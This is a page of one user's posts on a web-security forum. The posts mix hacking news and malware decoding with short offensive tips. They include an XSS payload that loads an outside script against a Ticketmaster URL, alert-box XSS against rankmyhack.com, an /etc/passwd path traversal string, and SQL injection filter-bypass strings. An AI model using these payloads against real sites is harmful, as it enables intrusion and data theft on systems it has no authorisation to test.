Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Current Page: 1 of 13
Results 1 - 30 of 383
1 year ago
PaPPy
Saw this today: Tinkode fined more than $120,000 and sentenced to 2 years in jail. http://www.computerworlduk.com/news/security/3403725/tinkode-gets-two-year-suspended-sentence-for-nasa-pentagon-hack/
Forum: News and Links
1 year ago
PaPPy
I remember someone doing this before.. But if you wanted to start on your own, I would look at what sqlninja has to offer and start designing some features from it: http://sqlninja.sourceforge.net/sqlninjademo.html Also you could get havij, and do some wireshark sniffing to see all the ways it tries to SQL inject. The increment part wouldn't be hard: http://www.tizag.com/phpT/whileloop.php
Forum: SQL and Code Injection
2 years ago
PaPPy
look for webserver log files or httpd
Forum: SQL and Code Injection
2 years ago
PaPPy
how can you be infected with an SQL server?
Forum: SQL and Code Injection
2 years ago
PaPPy
lol first thing i noticed
Forum: XSS Info
2 years ago
PaPPy
Looks like someone beat me to the punch: http://tndb.us/
Forum: Privacy
2 years ago
PaPPy
didn't find xss but broke something here http://adliran.ir/TrmBill/Bill.aspx?CtrlId="
Forum: XSS Info
2 years ago
PaPPy
Came up with this script to find all files and clean them http://pastebin.mozilla.org/1577737
Forum: Obfuscation
2 years ago
PaPPy
The payload is the GetMama malware: http://blog.sucuri.net/2012/04/getmama-conditional-malware-affecting-thousands-of-sites.html It was base64 encoded a lot. This shows what the javascript looks like: http://sucuri.net/new-malware-eval-getmama-encoded-javascript.html Here is a commented version of your above code, explaining the decoding process: http://pastebin.me/bc23773578d79a55882d7c
Forum: Obfuscation
2 years ago
PaPPy
is onmouseover restricted? if not use the same style so anywhere on screen they move the mouse, it will cause the xss to run
Forum: XSS Info
2 years ago
PaPPy
sql server shouldn't be running as root, or have any read/write permission, so load_file and into outfile cannot be used
Forum: SQL and Code Injection
2 years ago
PaPPy
found them http://www.xssed.com/archive/domain=baidu.com
Forum: XSS Info
2 years ago
PaPPy
wow very difficult, it's like people don't even try
Forum: SQL and Code Injection
2 years ago
PaPPy
I didn't see anything about extradition to the US. I don't know how the laws are in Romania... but he probably is "fucked".
Forum: News and Links
2 years ago
PaPPy
TinKode Arrested in Romania for hacking into NASA and the Pentagon http://www.pcmag.com/article2/0,2817,2399698,00.asp
Forum: News and Links
2 years ago
PaPPy
have you tried any of these? https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/?test=">test https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/">test https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/#">test
Forum: XSS Info
2 years ago
PaPPy
So I was perusing around our local Sur La Table and came across this http://i.imgur.com/LeGpD.jpg (to the left is a Cisco VoIP phone that it was plugged in to) Needless to say it caught my attention. I tried the 3 finger salute, I tried the Windows button, and the windows + D button and I wasn't getting anywhere. So I started to poke around the menus and all that I had access to wa
Forum: Full Disclosure
2 years ago
PaPPy
I know this is an old post, but here are some breakdowns: 7,889,999,999 possibilities (no exclusions from 2010000000 - 9899999999) divide by 199 attempts a day 39,648,242 days required to check all divide by 365 days 108,626 years to complete 3,270,000,461 possibilities (according to possibilities on their website. excludes non available area codes) divide by 199 att
Forum: Privacy
2 years ago
PaPPy
I am trying to decrypt the image created text on tnid.us I have already written a post on how to read all the possibilities with OCR (http://sla.ckers.org/forum/read.php?15,36823,36823#msg-36823), but I want to try cracking the string, as it would go so much faster (and less software to install). I have tried eliminating common letters like N2tLG5e6t10I-dici1q662kZ2LtQ.. But I don't know
Forum: Projects
2 years ago
PaPPy
are there any characters the web server is stripping? example: ~ is stripped un~ion se~lect....etc etc i one time saw the word union stripped so it turned into UNunionION SELunionECT 1,2,3,4,5
Forum: SQL and Code Injection
2 years ago
PaPPy
thanks, hope it slows down the spam
Forum: News and Links
2 years ago
PaPPy
i used the php version and it worked fine
Forum: XSS Info
2 years ago
PaPPy
http://ntr.ticketmaster.com/ntw/forward?from=-->"><script src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js></script>
Forum: Full Disclosure
2 years ago
PaPPy
Came across this service that is offering a service to scan your devices for a fee. http://www.secpoint.com/cloud-penetrator-web-vulnerability-scanner.html But I noticed 2 potential problems. First, they have an image that includes a remote image. Not sure if this can be exploited: http://www.secpoint.com/thumb.php?img=http://data.xssed.org/images/xssed_logo.gif&h=100&w=150&d
Forum: Full Disclosure
2 years ago
PaPPy
http://rankmyhack.com/login.php?r="><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)&
Forum: Full Disclosure
3 years ago
PaPPy
So I came across a Twitter post from Kevin Mitnick https://twitter.com/#!/kevinmitnick/status/96331122321006592 "Wow! ATT gives out your information to anyone. Check it out: http://tnid.us" So tnid.us allows you to put in a cellphone number and it will give you the corresponding Caller ID information (and some other info). Well I noticed that they had no automation protection (oth
Forum: Privacy
3 years ago
PaPPy
Fiancée visited ladygaga.com and Nod32 popped up a blocked .js script hxxp://c390749.r49.cf2.rackcdn.com/ursvp/widget/js/ursvp.js I don't want to open it, but any search for rackcdn.com + malware shows lots of results. Thought y'all would find it amusing that such a big star can't afford good web security.
Forum: News and Links
3 years ago
PaPPy
did you try /etc/passwd%00 or /etc/passwd%0a
Forum: SQL and Code Injection
3 years ago
PaPPy
http://www.google.com/search?q=moodle+vulnerability&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a RCE: http://tracker.moodle.org/browse/MDL-17207 SQL injection: http://www.securityfocus.com/bid/20395 google, it's a hell of a drug
Forum: SQL and Code Injection